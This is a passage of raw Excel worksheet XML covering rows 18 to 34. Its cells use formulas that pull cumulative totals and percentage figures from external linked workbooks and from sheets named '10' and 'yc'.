        <f>J28+J38+J48+J58+J66+J73</f>
        <v>0</v>
      </c>
      <c r="K18" s="194">
        <f>J18+'10'!K18</f>
        <v>0</v>
      </c>
      <c r="L18" s="194">
        <f>K18+yc!L18</f>
        <v>0</v>
      </c>
      <c r="M18" s="194"/>
      <c r="N18" s="195"/>
      <c r="O18" s="199"/>
      <c r="P18" s="214"/>
      <c r="Q18" s="193" t="s">
        <v>233</v>
      </c>
      <c r="R18" s="209">
        <f>'[12]11'!$W$74</f>
        <v>217.8</v>
      </c>
      <c r="S18" s="209">
        <f>'[12]11'!$X$74</f>
        <v>216.7</v>
      </c>
      <c r="T18" s="209">
        <f>'[12]11'!$Y$74</f>
        <v>222.208856735346</v>
      </c>
      <c r="U18" s="209">
        <f>'[12]11'!$T$74</f>
        <v>41.6666666666667</v>
      </c>
      <c r="V18" s="209">
        <f>'[12]11'!$U$74</f>
        <v>7.57575757575758</v>
      </c>
      <c r="W18" s="209">
        <f>'[12]11'!$V$74</f>
        <v>7.02814009661836</v>
      </c>
      <c r="X18" s="209">
        <f>'[12]11'!$Q$74</f>
        <v>10</v>
      </c>
      <c r="Y18" s="209">
        <f>'[12]11'!$R$74</f>
        <v>20</v>
      </c>
      <c r="Z18" s="209">
        <f>'[12]11'!$S$74</f>
        <v>581.93</v>
      </c>
    </row>
    <row r="19" ht="15.75" customHeight="1" spans="1:26">
      <c r="A19" s="191"/>
      <c r="B19" s="191"/>
      <c r="C19" s="193" t="s">
        <v>259</v>
      </c>
      <c r="D19" s="193"/>
      <c r="E19" s="194">
        <f>E29+E39+E49+E59+E67+E74</f>
        <v>0</v>
      </c>
      <c r="F19" s="194"/>
      <c r="G19" s="194">
        <f>G29+G39+G49+G59+G67+G74</f>
        <v>0</v>
      </c>
      <c r="H19" s="194">
        <f>G19+'10'!H19</f>
        <v>0</v>
      </c>
      <c r="I19" s="194">
        <f>H19+yc!I19</f>
        <v>0</v>
      </c>
      <c r="J19" s="194">
        <f>J29+J39+J49+J59+J67+J74+J78</f>
        <v>0</v>
      </c>
      <c r="K19" s="194">
        <f>J19+'10'!K19</f>
        <v>0</v>
      </c>
      <c r="L19" s="194">
        <f>K19+yc!L19</f>
        <v>0</v>
      </c>
      <c r="M19" s="194"/>
      <c r="N19" s="195"/>
      <c r="O19" s="199"/>
      <c r="P19" s="213" t="s">
        <v>304</v>
      </c>
      <c r="Q19" s="193" t="s">
        <v>291</v>
      </c>
      <c r="R19" s="209">
        <f>'[13]11'!$W$72</f>
        <v>1e-5</v>
      </c>
      <c r="S19" s="209">
        <f>'[13]11'!$X$72</f>
        <v>1e-5</v>
      </c>
      <c r="T19" s="209">
        <f>'[13]11'!$Y$72</f>
        <v>9.11931818181818e-6</v>
      </c>
      <c r="U19" s="209">
        <f>'[13]11'!$T$72</f>
        <v>4.16666666666667e-6</v>
      </c>
      <c r="V19" s="209">
        <f>'[13]11'!$U$72</f>
        <v>4.16666666666667e-6</v>
      </c>
      <c r="W19" s="209">
        <f>'[13]11'!$V$72</f>
        <v>4.2512077294686e-6</v>
      </c>
      <c r="X19" s="209">
        <f>'[13]11'!$Q$72</f>
        <v>1e-6</v>
      </c>
      <c r="Y19" s="209">
        <f>'[13]11'!$R$72</f>
        <v>1.1e-5</v>
      </c>
      <c r="Z19" s="209">
        <f>'[13]11'!$S$72</f>
        <v>0.000352</v>
      </c>
    </row>
    <row r="20" ht="15.75" customHeight="1" spans="1:26">
      <c r="A20" s="191"/>
      <c r="B20" s="193" t="s">
        <v>261</v>
      </c>
      <c r="C20" s="193"/>
      <c r="D20" s="193"/>
      <c r="E20" s="194">
        <f>E30+E40+E50+E60</f>
        <v>0</v>
      </c>
      <c r="F20" s="194"/>
      <c r="G20" s="194">
        <f>G30+G40+G50+G60</f>
        <v>0</v>
      </c>
      <c r="H20" s="194">
        <f>G20+'10'!H20</f>
        <v>0</v>
      </c>
      <c r="I20" s="194">
        <f>H20+yc!I20</f>
        <v>0</v>
      </c>
      <c r="J20" s="194">
        <f>J30+J40+J50+J60</f>
        <v>0</v>
      </c>
      <c r="K20" s="194">
        <f>J20+'10'!K20</f>
        <v>0</v>
      </c>
      <c r="L20" s="194">
        <f>K20+yc!L20</f>
        <v>0</v>
      </c>
      <c r="M20" s="194"/>
      <c r="N20" s="195"/>
      <c r="O20" s="199"/>
      <c r="P20" s="215"/>
      <c r="Q20" s="193" t="s">
        <v>292</v>
      </c>
      <c r="R20" s="209">
        <f>'[13]11'!$W$73</f>
        <v>1e-5</v>
      </c>
      <c r="S20" s="209">
        <f>'[13]11'!$X$73</f>
        <v>1e-5</v>
      </c>
      <c r="T20" s="209">
        <f>'[13]11'!$Y$73</f>
        <v>239.299857614668</v>
      </c>
      <c r="U20" s="209">
        <f>'[13]11'!$T$73</f>
        <v>4.16666666666667e-6</v>
      </c>
      <c r="V20" s="209">
        <f>'[13]11'!$U$73</f>
        <v>4.16666666666667e-6</v>
      </c>
      <c r="W20" s="209">
        <f>'[13]11'!$V$73</f>
        <v>69.8276612560387</v>
      </c>
      <c r="X20" s="209">
        <f>'[13]11'!$Q$73</f>
        <v>1e-6</v>
      </c>
      <c r="Y20" s="209">
        <f>'[13]11'!$R$73</f>
        <v>1.1e-5</v>
      </c>
      <c r="Z20" s="209">
        <f>'[13]11'!$S$73</f>
        <v>5781.730352</v>
      </c>
    </row>
    <row r="21" ht="15.75" customHeight="1" spans="1:26">
      <c r="A21" s="191" t="s">
        <v>229</v>
      </c>
      <c r="B21" s="193" t="s">
        <v>227</v>
      </c>
      <c r="C21" s="193"/>
      <c r="D21" s="193"/>
      <c r="E21" s="194">
        <v>190000</v>
      </c>
      <c r="F21" s="194">
        <f>'[10]11'!$D$22</f>
        <v>83053.31</v>
      </c>
      <c r="G21" s="194">
        <f>'[10]11'!$E$22</f>
        <v>5173</v>
      </c>
      <c r="H21" s="194">
        <f>G21+'10'!H21</f>
        <v>74688</v>
      </c>
      <c r="I21" s="194">
        <f>H21+yc!I21</f>
        <v>2184126</v>
      </c>
      <c r="J21" s="194">
        <f>'[10]11'!$I$22</f>
        <v>8945.62</v>
      </c>
      <c r="K21" s="194">
        <f>J21+'10'!K21</f>
        <v>87406.26</v>
      </c>
      <c r="L21" s="194">
        <f>K21+yc!L21</f>
        <v>2153860.26</v>
      </c>
      <c r="M21" s="194">
        <f>'[10]11'!$L$22</f>
        <v>70335.05</v>
      </c>
      <c r="N21" s="195">
        <f>M21/47000*100</f>
        <v>149.649042553191</v>
      </c>
      <c r="O21" s="199"/>
      <c r="P21" s="215"/>
      <c r="Q21" s="193" t="s">
        <v>294</v>
      </c>
      <c r="R21" s="209">
        <f>'[13]11'!$W$81</f>
        <v>281.749338744157</v>
      </c>
      <c r="S21" s="209">
        <f>'[13]11'!$X$81</f>
        <v>284.063600697047</v>
      </c>
      <c r="T21" s="209">
        <f>'[13]11'!$Y$81</f>
        <v>275.998550337295</v>
      </c>
      <c r="U21" s="209">
        <f>'[13]11'!$T$81</f>
        <v>31.943287037037</v>
      </c>
      <c r="V21" s="209">
        <f>'[13]11'!$U$81</f>
        <v>43.2319023569024</v>
      </c>
      <c r="W21" s="209">
        <f>'[13]11'!$V$81</f>
        <v>36.351395598497</v>
      </c>
      <c r="X21" s="209">
        <f>'[13]11'!$Q$81</f>
        <v>7.66638888888889</v>
      </c>
      <c r="Y21" s="209">
        <f>'[13]11'!$R$81</f>
        <v>114.132222222222</v>
      </c>
      <c r="Z21" s="209">
        <f>'[13]11'!$S$81</f>
        <v>3009.89555555556</v>
      </c>
    </row>
    <row r="22" ht="15.75" customHeight="1" spans="1:26">
      <c r="A22" s="191"/>
      <c r="B22" s="191" t="s">
        <v>244</v>
      </c>
      <c r="C22" s="193" t="s">
        <v>245</v>
      </c>
      <c r="D22" s="193" t="s">
        <v>246</v>
      </c>
      <c r="E22" s="194">
        <v>163000</v>
      </c>
      <c r="F22" s="194">
        <f>'[10]11'!$D$17</f>
        <v>189966.352</v>
      </c>
      <c r="G22" s="194">
        <f>'[10]11'!$E$17</f>
        <v>0</v>
      </c>
      <c r="H22" s="194">
        <f>G22+'10'!H22</f>
        <v>62660</v>
      </c>
      <c r="I22" s="194">
        <f>H22+yc!I22</f>
        <v>2093641</v>
      </c>
      <c r="J22" s="194">
        <f>'[10]11'!$I$17</f>
        <v>5933.3</v>
      </c>
      <c r="K22" s="194">
        <f>J22+'10'!K22</f>
        <v>72688.34</v>
      </c>
      <c r="L22" s="194">
        <f>K22+yc!L22</f>
        <v>1964149.72</v>
      </c>
      <c r="M22" s="194">
        <f>'[10]11'!$L$17</f>
        <v>179938.012</v>
      </c>
      <c r="N22" s="216">
        <f>(M22+M23)/(50000+150000)*100</f>
        <v>89.969006</v>
      </c>
      <c r="O22" s="199"/>
      <c r="P22" s="215"/>
      <c r="Q22" s="193" t="s">
        <v>233</v>
      </c>
      <c r="R22" s="209">
        <f>'[13]11'!$W$79</f>
        <v>100.826474681696</v>
      </c>
      <c r="S22" s="209">
        <f>'[13]11'!$X$79</f>
        <v>99.8359901632917</v>
      </c>
      <c r="T22" s="209">
        <f>'[13]11'!$Y$79</f>
        <v>102.168301136812</v>
      </c>
      <c r="U22" s="209">
        <f>'[13]11'!$T$79</f>
        <v>67.3599537037037</v>
      </c>
      <c r="V22" s="209">
        <f>'[13]11'!$U$79</f>
        <v>54.210122053872</v>
      </c>
      <c r="W22" s="209">
        <f>'[13]11'!$V$79</f>
        <v>45.6603093129361</v>
      </c>
      <c r="X22" s="209">
        <f>'[13]11'!$Q$79</f>
        <v>16.1663888888889</v>
      </c>
      <c r="Y22" s="209">
        <f>'[13]11'!$R$79</f>
        <v>143.114722222222</v>
      </c>
      <c r="Z22" s="209">
        <f>'[13]11'!$S$79</f>
        <v>3780.67361111111</v>
      </c>
    </row>
    <row r="23" ht="15.75" customHeight="1" spans="1:26">
      <c r="A23" s="191"/>
      <c r="B23" s="193"/>
      <c r="C23" s="193"/>
      <c r="D23" s="206" t="s">
        <v>248</v>
      </c>
      <c r="E23" s="194"/>
      <c r="F23" s="194">
        <f>'[10]11'!$D$20</f>
        <v>0</v>
      </c>
      <c r="G23" s="194">
        <f>'[10]11'!$E$20</f>
        <v>0</v>
      </c>
      <c r="H23" s="194">
        <f>G23+'10'!H23</f>
        <v>0</v>
      </c>
      <c r="I23" s="194">
        <f>H23+yc!I23</f>
        <v>0</v>
      </c>
      <c r="J23" s="194">
        <f>'[10]11'!$I$20</f>
        <v>0</v>
      </c>
      <c r="K23" s="194">
        <f>J23+'10'!K23</f>
        <v>0</v>
      </c>
      <c r="L23" s="194">
        <f>K23+yc!L23</f>
        <v>0</v>
      </c>
      <c r="M23" s="194">
        <f>'[10]11'!$L$21</f>
        <v>0</v>
      </c>
      <c r="N23" s="217"/>
      <c r="O23" s="199"/>
      <c r="P23" s="214"/>
      <c r="Q23" s="193" t="s">
        <v>235</v>
      </c>
      <c r="R23" s="209">
        <f>'[13]11'!$W$80</f>
        <v>92.5367606207637</v>
      </c>
      <c r="S23" s="209">
        <f>'[13]11'!$X$80</f>
        <v>83.8109408560218</v>
      </c>
      <c r="T23" s="209">
        <f>'[13]11'!$Y$80</f>
        <v>79.3268571036502</v>
      </c>
      <c r="U23" s="209">
        <f>'[13]11'!$T$80</f>
        <v>31.2488425925926</v>
      </c>
      <c r="V23" s="209">
        <f>'[13]11'!$U$80</f>
        <v>43.8441708754209</v>
      </c>
      <c r="W23" s="209">
        <f>'[13]11'!$V$80</f>
        <v>32.8575415995706</v>
      </c>
      <c r="X23" s="209">
        <f>'[13]11'!$Q$80</f>
        <v>7.49972222222222</v>
      </c>
      <c r="Y23" s="209">
        <f>'[13]11'!$R$80</f>
        <v>115.748611111111</v>
      </c>
      <c r="Z23" s="209">
        <f>'[13]11'!$S$80</f>
        <v>2720.60444444445</v>
      </c>
    </row>
    <row r="24" ht="15.75" customHeight="1" spans="1:26">
      <c r="A24" s="191"/>
      <c r="B24" s="193"/>
      <c r="C24" s="193" t="s">
        <v>249</v>
      </c>
      <c r="D24" s="206" t="s">
        <v>250</v>
      </c>
      <c r="E24" s="194"/>
      <c r="F24" s="194">
        <f>'[10]11'!$D$21</f>
        <v>0</v>
      </c>
      <c r="G24" s="194">
        <f>'[10]11'!$E$56</f>
        <v>0</v>
      </c>
      <c r="H24" s="194">
        <f>G24+'10'!H24</f>
        <v>0</v>
      </c>
      <c r="I24" s="194">
        <f>H24+yc!I24</f>
        <v>0</v>
      </c>
      <c r="J24" s="194">
        <f>'[10]11'!$I$56</f>
        <v>2059.3</v>
      </c>
      <c r="K24" s="194">
        <f>J24+'10'!K24</f>
        <v>18536.56</v>
      </c>
      <c r="L24" s="194">
        <f>K24+yc!L24</f>
        <v>298363.09</v>
      </c>
      <c r="M24" s="194">
        <f>'[10]11'!$L$20</f>
        <v>0</v>
      </c>
      <c r="N24" s="195"/>
      <c r="O24" s="199"/>
      <c r="P24" s="218" t="s">
        <v>262</v>
      </c>
      <c r="Q24" s="193" t="s">
        <v>233</v>
      </c>
      <c r="R24" s="209">
        <f>'[14]11'!$R$6</f>
        <v>80.4255319148936</v>
      </c>
      <c r="S24" s="209">
        <f>'[14]11'!$S$6</f>
        <v>84.0523731587561</v>
      </c>
      <c r="T24" s="209">
        <f>'[14]11'!$T$6</f>
        <v>86.0868204855671</v>
      </c>
      <c r="U24" s="209">
        <f>'[14]11'!$O$6</f>
        <v>48.9583333333333</v>
      </c>
      <c r="V24" s="209">
        <f>'[14]11'!$P$6</f>
        <v>57.8598484848485</v>
      </c>
      <c r="W24" s="209">
        <f>'[14]11'!$Q$6</f>
        <v>52.4960144927536</v>
      </c>
      <c r="X24" s="209">
        <f>'[14]11'!$L$6</f>
        <v>11.75</v>
      </c>
      <c r="Y24" s="209">
        <f>'[14]11'!$M$6</f>
        <v>152.75</v>
      </c>
      <c r="Z24" s="209">
        <f>'[14]11'!$N$6</f>
        <v>4346.67</v>
      </c>
    </row>
    <row r="25" ht="15.75" customHeight="1" spans="1:26">
      <c r="A25" s="191"/>
      <c r="B25" s="193"/>
      <c r="C25" s="193"/>
      <c r="D25" s="193" t="s">
        <v>251</v>
      </c>
      <c r="E25" s="194"/>
      <c r="F25" s="194"/>
      <c r="G25" s="194">
        <f>'[10]11'!$E$69</f>
        <v>0</v>
      </c>
      <c r="H25" s="194">
        <f>G25+'10'!H25</f>
        <v>0</v>
      </c>
      <c r="I25" s="194">
        <f>H25+yc!I25</f>
        <v>0</v>
      </c>
      <c r="J25" s="194">
        <f>'[10]11'!$I$69</f>
        <v>0</v>
      </c>
      <c r="K25" s="194">
        <f>J25+'10'!K25</f>
        <v>473.78</v>
      </c>
      <c r="L25" s="194">
        <f>K25+yc!L25</f>
        <v>79794.63</v>
      </c>
      <c r="M25" s="194"/>
      <c r="N25" s="195"/>
      <c r="O25" s="199"/>
      <c r="P25" s="219"/>
      <c r="Q25" s="193" t="s">
        <v>235</v>
      </c>
      <c r="R25" s="209">
        <f>'[14]11'!$R$7</f>
        <v>199.230769230769</v>
      </c>
      <c r="S25" s="209">
        <f>'[14]11'!$S$7</f>
        <v>202.931297709924</v>
      </c>
      <c r="T25" s="209">
        <f>'[14]11'!$T$7</f>
        <v>188.05584580049</v>
      </c>
      <c r="U25" s="209">
        <f>'[14]11'!$O$7</f>
        <v>54.1666666666667</v>
      </c>
      <c r="V25" s="209">
        <f>'[14]11'!$P$7</f>
        <v>49.6212121212121</v>
      </c>
      <c r="W25" s="209">
        <f>'[14]11'!$Q$7</f>
        <v>50.1640096618357</v>
      </c>
      <c r="X25" s="209">
        <f>'[14]11'!$L$7</f>
        <v>13</v>
      </c>
      <c r="Y25" s="209">
        <f>'[14]11'!$M$7</f>
        <v>131</v>
      </c>
      <c r="Z25" s="209">
        <f>'[14]11'!$N$7</f>
        <v>4153.58</v>
      </c>
    </row>
    <row r="26" ht="15.75" customHeight="1" spans="1:26">
      <c r="A26" s="191"/>
      <c r="B26" s="193" t="s">
        <v>253</v>
      </c>
      <c r="C26" s="193"/>
      <c r="D26" s="193"/>
      <c r="E26" s="194"/>
      <c r="F26" s="194"/>
      <c r="G26" s="194"/>
      <c r="H26" s="194">
        <f>G26+'10'!H26</f>
        <v>0</v>
      </c>
      <c r="I26" s="194">
        <f>H26+yc!I26</f>
        <v>0</v>
      </c>
      <c r="J26" s="194">
        <f>J27+J30</f>
        <v>0</v>
      </c>
      <c r="K26" s="194">
        <f>J26+'10'!K26</f>
        <v>0</v>
      </c>
      <c r="L26" s="194">
        <f>K26+yc!L26</f>
        <v>0</v>
      </c>
      <c r="M26" s="194"/>
      <c r="N26" s="195"/>
      <c r="O26" s="199"/>
      <c r="P26" s="191" t="s">
        <v>263</v>
      </c>
      <c r="Q26" s="193" t="s">
        <v>235</v>
      </c>
      <c r="R26" s="209">
        <f>'[15]11'!$I$38</f>
        <v>0</v>
      </c>
      <c r="S26" s="209">
        <f>'[15]11'!$J$38</f>
        <v>0</v>
      </c>
      <c r="T26" s="209">
        <f>'[15]11'!$K$38</f>
        <v>0</v>
      </c>
      <c r="U26" s="209">
        <f>'[15]11'!$F$38</f>
        <v>0</v>
      </c>
      <c r="V26" s="209">
        <f>'[15]11'!$G$38</f>
        <v>0</v>
      </c>
      <c r="W26" s="209">
        <f>'[15]11'!$H$38</f>
        <v>0</v>
      </c>
      <c r="X26" s="209">
        <f>'[15]11'!$C$38</f>
        <v>0</v>
      </c>
      <c r="Y26" s="209">
        <f>'[15]11'!$D$38</f>
        <v>0</v>
      </c>
      <c r="Z26" s="209">
        <f>'[15]11'!$E$38</f>
        <v>0</v>
      </c>
    </row>
    <row r="27" ht="15.75" customHeight="1" spans="1:26">
      <c r="A27" s="191"/>
      <c r="B27" s="193" t="s">
        <v>254</v>
      </c>
      <c r="C27" s="193"/>
      <c r="D27" s="193"/>
      <c r="E27" s="194">
        <v>190000</v>
      </c>
      <c r="F27" s="194"/>
      <c r="G27" s="194"/>
      <c r="H27" s="194">
        <f>G27+'10'!H27</f>
        <v>0</v>
      </c>
      <c r="I27" s="194">
        <f>H27+yc!I27</f>
        <v>0</v>
      </c>
      <c r="J27" s="194">
        <f>SUM(J28:J29)</f>
        <v>0</v>
      </c>
      <c r="K27" s="194">
        <f>J27+'10'!K27</f>
        <v>0</v>
      </c>
      <c r="L27" s="194">
        <f>K27+yc!L27</f>
        <v>0</v>
      </c>
      <c r="M27" s="194"/>
      <c r="N27" s="195"/>
      <c r="O27" s="220" t="s">
        <v>264</v>
      </c>
      <c r="P27" s="191" t="s">
        <v>237</v>
      </c>
      <c r="Q27" s="191"/>
      <c r="R27" s="209">
        <f>'[11]11'!$W$69</f>
        <v>21.9733736762481</v>
      </c>
      <c r="S27" s="209">
        <f>'[11]11'!$X$69</f>
        <v>22.9071796817462</v>
      </c>
      <c r="T27" s="209">
        <f>'[11]11'!$Y$69</f>
        <v>25.3023878343866</v>
      </c>
      <c r="U27" s="221">
        <f>'[11]11'!$T$69</f>
        <v>100</v>
      </c>
      <c r="V27" s="209">
        <f>'[11]11'!$U$69</f>
        <v>63.7575757575758</v>
      </c>
      <c r="W27" s="209">
        <f>'[11]11'!$V$69</f>
        <v>68.2270531400966</v>
      </c>
      <c r="X27" s="209" t="str">
        <f>'[11]11'!$Q$69</f>
        <v>24.00</v>
      </c>
      <c r="Y27" s="209" t="str">
        <f>'[11]11'!$R$69</f>
        <v>168.32</v>
      </c>
      <c r="Z27" s="209" t="str">
        <f>'[11]11'!$S$69</f>
        <v>5649.20</v>
      </c>
    </row>
    <row r="28" ht="15.75" customHeight="1" spans="1:26">
      <c r="A28" s="191"/>
      <c r="B28" s="191" t="s">
        <v>231</v>
      </c>
      <c r="C28" s="193" t="s">
        <v>257</v>
      </c>
      <c r="D28" s="193"/>
      <c r="E28" s="194"/>
      <c r="F28" s="194"/>
      <c r="G28" s="194"/>
      <c r="H28" s="194">
        <f>G28+'10'!H28</f>
        <v>0</v>
      </c>
      <c r="I28" s="194">
        <f>H28+yc!I28</f>
        <v>0</v>
      </c>
      <c r="J28" s="194"/>
      <c r="K28" s="194">
        <f>J28+'10'!K28</f>
        <v>0</v>
      </c>
      <c r="L28" s="194">
        <f>K28+yc!L28</f>
        <v>0</v>
      </c>
      <c r="M28" s="194"/>
      <c r="N28" s="195"/>
      <c r="O28" s="222"/>
      <c r="P28" s="223" t="s">
        <v>306</v>
      </c>
      <c r="Q28" s="224"/>
      <c r="R28" s="209">
        <f>'[10]11'!$W$104</f>
        <v>0</v>
      </c>
      <c r="S28" s="209">
        <f>'[10]11'!$X$104</f>
        <v>28.3179061602293</v>
      </c>
      <c r="T28" s="209">
        <f>'[10]11'!$Y$104</f>
        <v>26.0491177026315</v>
      </c>
      <c r="U28" s="209">
        <f>'[10]11'!$T$104</f>
        <v>0</v>
      </c>
      <c r="V28" s="209">
        <f>'[10]11'!$U$104</f>
        <v>87.4875</v>
      </c>
      <c r="W28" s="209">
        <f>'[10]11'!$V$104</f>
        <v>65.1089009661836</v>
      </c>
      <c r="X28" s="209">
        <f>'[10]11'!$Q$104</f>
        <v>0</v>
      </c>
      <c r="Y28" s="209">
        <f>'[10]11'!$R$104</f>
        <v>230.967</v>
      </c>
      <c r="Z28" s="209">
        <f>'[10]11'!$S$104</f>
        <v>5391.017</v>
      </c>
    </row>
    <row r="29" ht="15.75" customHeight="1" spans="1:26">
      <c r="A29" s="191"/>
      <c r="B29" s="191"/>
      <c r="C29" s="193" t="s">
        <v>259</v>
      </c>
      <c r="D29" s="193"/>
      <c r="E29" s="194"/>
      <c r="F29" s="194"/>
      <c r="G29" s="194"/>
      <c r="H29" s="194">
        <f>G29+'10'!H29</f>
        <v>0</v>
      </c>
      <c r="I29" s="194">
        <f>H29+yc!I29</f>
        <v>0</v>
      </c>
      <c r="J29" s="194"/>
      <c r="K29" s="194">
        <f>J29+'10'!K29</f>
        <v>0</v>
      </c>
      <c r="L29" s="194">
        <f>K29+yc!L29</f>
        <v>0</v>
      </c>
      <c r="M29" s="225"/>
      <c r="N29" s="195"/>
      <c r="O29" s="222"/>
      <c r="P29" s="223" t="s">
        <v>307</v>
      </c>
      <c r="Q29" s="224"/>
      <c r="R29" s="209">
        <f>'[10]11'!$W$105</f>
        <v>0</v>
      </c>
      <c r="S29" s="209">
        <f>'[10]11'!$X$105</f>
        <v>0</v>
      </c>
      <c r="T29" s="209">
        <f>'[10]11'!$Y$105</f>
        <v>29.9342377123697</v>
      </c>
      <c r="U29" s="209">
        <f>'[10]11'!$T$105</f>
        <v>0</v>
      </c>
      <c r="V29" s="209">
        <f>'[10]11'!$U$105</f>
        <v>0</v>
      </c>
      <c r="W29" s="209">
        <f>'[10]11'!$V$105</f>
        <v>33.8669323671498</v>
      </c>
      <c r="X29" s="209">
        <f>'[10]11'!$Q$105</f>
        <v>0</v>
      </c>
      <c r="Y29" s="209">
        <f>'[10]11'!$R$105</f>
        <v>0</v>
      </c>
      <c r="Z29" s="209">
        <f>'[10]11'!$S$105</f>
        <v>2804.182</v>
      </c>
    </row>
    <row r="30" ht="15.75" customHeight="1" spans="1:26">
      <c r="A30" s="191"/>
      <c r="B30" s="193" t="s">
        <v>261</v>
      </c>
      <c r="C30" s="193"/>
      <c r="D30" s="193"/>
      <c r="E30" s="194"/>
      <c r="F30" s="194"/>
      <c r="G30" s="194"/>
      <c r="H30" s="194">
        <f>G30+'10'!H30</f>
        <v>0</v>
      </c>
      <c r="I30" s="194">
        <f>H30+yc!I30</f>
        <v>0</v>
      </c>
      <c r="J30" s="194"/>
      <c r="K30" s="194">
        <f>J30+'10'!K30</f>
        <v>0</v>
      </c>
      <c r="L30" s="194">
        <f>K30+yc!L30</f>
        <v>0</v>
      </c>
      <c r="M30" s="225"/>
      <c r="N30" s="195"/>
      <c r="O30" s="222"/>
      <c r="P30" s="223" t="s">
        <v>252</v>
      </c>
      <c r="Q30" s="224"/>
      <c r="R30" s="209">
        <f>'[12]11'!$W$72</f>
        <v>0</v>
      </c>
      <c r="S30" s="226">
        <f>'[12]11'!$X$72</f>
        <v>0</v>
      </c>
      <c r="T30" s="209">
        <f>'[12]11'!$Y$72</f>
        <v>0</v>
      </c>
      <c r="U30" s="209">
        <f>'[12]11'!$T$72</f>
        <v>0</v>
      </c>
      <c r="V30" s="209">
        <f>'[12]11'!$U$72</f>
        <v>0</v>
      </c>
      <c r="W30" s="209">
        <f>'[12]11'!$V$72</f>
        <v>0</v>
      </c>
      <c r="X30" s="209">
        <f>'[12]11'!$Q$72</f>
        <v>0</v>
      </c>
      <c r="Y30" s="209">
        <f>'[12]11'!$R$72</f>
        <v>0</v>
      </c>
      <c r="Z30" s="209">
        <f>'[12]11'!$S$72</f>
        <v>0</v>
      </c>
    </row>
    <row r="31" ht="15.75" customHeight="1" spans="1:26">
      <c r="A31" s="191" t="s">
        <v>237</v>
      </c>
      <c r="B31" s="193" t="s">
        <v>227</v>
      </c>
      <c r="C31" s="193"/>
      <c r="D31" s="193"/>
      <c r="E31" s="194">
        <v>150000</v>
      </c>
      <c r="F31" s="194">
        <f>'[11]11'!$D$16</f>
        <v>65429.37</v>
      </c>
      <c r="G31" s="194">
        <f>'[11]11'!$E$16</f>
        <v>7968</v>
      </c>
      <c r="H31" s="194">
        <f>G31+'10'!H31</f>
        <v>52748</v>
      </c>
      <c r="I31" s="194">
        <f>H31+yc!I31</f>
        <v>1425755</v>
      </c>
      <c r="J31" s="194">
        <f>'[11]11'!$I$16</f>
        <v>4739.2</v>
      </c>
      <c r="K31" s="194">
        <f>J31+'10'!K31</f>
        <v>54153.56</v>
      </c>
      <c r="L31" s="194">
        <f>K31+yc!L31</f>
        <v>1410201.69</v>
      </c>
      <c r="M31" s="225">
        <f>'[11]11'!$L$16</f>
        <v>64023.81</v>
      </c>
      <c r="N31" s="195">
        <f>M31/75000*100</f>
        <v>85.36508</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'[11]11'!$D$13</f>
        <v>60437.506</v>
      </c>
      <c r="G32" s="194">
        <f>'[11]11'!$E$13</f>
        <v>6610</v>
      </c>
      <c r="H32" s="194">
        <f>G32+'10'!H32</f>
        <v>46986</v>
      </c>
      <c r="I32" s="194">
        <f>H32+yc!I32</f>
        <v>1574829</v>
      </c>
      <c r="J32" s="194">
        <f>'[11]11'!$I$13</f>
        <v>5531</v>
      </c>
      <c r="K32" s="194">
        <f>J32+'10'!K32</f>
        <v>38921</v>
      </c>
      <c r="L32" s="194">
        <f>K32+yc!L32</f>
        <v>1060399</v>
      </c>
      <c r="M32" s="225">
        <f>'[11]11'!$L$13</f>
        <v>67835.616</v>
      </c>
      <c r="N32" s="207">
        <f>(M32+M33)/50000*100</f>
        <v>135.671232</v>
      </c>
      <c r="O32" s="222"/>
      <c r="P32" s="223" t="s">
        <v>308</v>
      </c>
      <c r="Q32" s="224"/>
      <c r="R32" s="209">
        <f>'[13]11'!$W$76</f>
        <v>0</v>
      </c>
      <c r="S32" s="209">
        <f>'[13]11'!$X$76</f>
        <v>0</v>
      </c>
      <c r="T32" s="209">
        <f>'[13]11'!$Y$76</f>
        <v>0</v>
      </c>
      <c r="U32" s="209">
        <f>'[13]11'!$T$76</f>
        <v>4.16666666666667e-11</v>
      </c>
      <c r="V32" s="209">
        <f>'[13]11'!$U$76</f>
        <v>3.78787878787879e-11</v>
      </c>
      <c r="W32" s="209">
        <f>'[13]11'!$V$76</f>
        <v>4.10628019323672e-11</v>
      </c>
      <c r="X32" s="209">
        <f>'[13]11'!$Q$76</f>
        <v>1e-11</v>
      </c>
      <c r="Y32" s="209">
        <f>'[13]11'!$R$76</f>
        <v>1e-10</v>
      </c>
      <c r="Z32" s="209">
        <f>'[13]11'!$S$76</f>
        <v>3.4e-9</v>
      </c>
    </row>
    <row r="33" ht="15.75" customHeight="1" spans="1:26">
      <c r="A33" s="191"/>
      <c r="B33" s="193"/>
      <c r="C33" s="193"/>
      <c r="D33" s="206" t="s">
        <v>248</v>
      </c>
      <c r="E33" s="194"/>
      <c r="F33" s="194"/>
      <c r="G33" s="194">
        <f>'[11]11'!$E$14</f>
        <v>0</v>
      </c>
      <c r="H33" s="194">
        <f>G33+'10'!H33</f>
        <v>0</v>
      </c>
      <c r="I33" s="194">
        <f>H33+yc!I33</f>
        <v>0</v>
      </c>
      <c r="J33" s="194">
        <f>'[11]11'!$I$14</f>
        <v>0</v>
      </c>
      <c r="K33" s="194">
        <f>J33+'10'!K33</f>
        <v>0</v>
      </c>
      <c r="L33" s="194">
        <f>K33+yc!L33</f>
        <v>0</v>
      </c>
      <c r="M33" s="225">
        <f>'[11]11'!$L$14</f>
        <v>0</v>
      </c>
      <c r="N33" s="212"/>
      <c r="O33" s="222"/>
      <c r="P33" s="223" t="s">
        <v>309</v>
      </c>
      <c r="Q33" s="224"/>
      <c r="R33" s="209">
        <f>'[13]11'!$W$77</f>
        <v>0</v>
      </c>
      <c r="S33" s="209">
        <f>'[13]11'!$X$77</f>
        <v>0</v>
      </c>
      <c r="T33" s="209">
        <f>'[13]11'!$Y$77</f>
        <v>19.77</v>
      </c>
      <c r="U33" s="209">
        <f>'[13]11'!$T$77</f>
        <v>4.16666666666667e-11</v>
      </c>
      <c r="V33" s="209">
        <f>'[13]11'!$U$77</f>
        <v>3.78787878787879e-12</v>
      </c>
      <c r="W33" s="209">
        <f>'[13]11'!$V$77</f>
        <v>61.1089371980691</v>
      </c>
      <c r="X33" s="209">
        <f>'[13]11'!$Q$77</f>
        <v>1e-11</v>
      </c>
      <c r="Y33" s="209">
        <f>'[13]11'!$R$77</f>
        <v>1e-11</v>
      </c>
      <c r="Z33" s="209">
        <f>'[13]11'!$S$77</f>
        <v>5059.82000000012</v>
      </c>
    </row>
    <row r="34" ht="15.75" customHeight="1" spans="1:26">
      <c r="A34" s="191"/>
      <c r="B34" s="193"/>
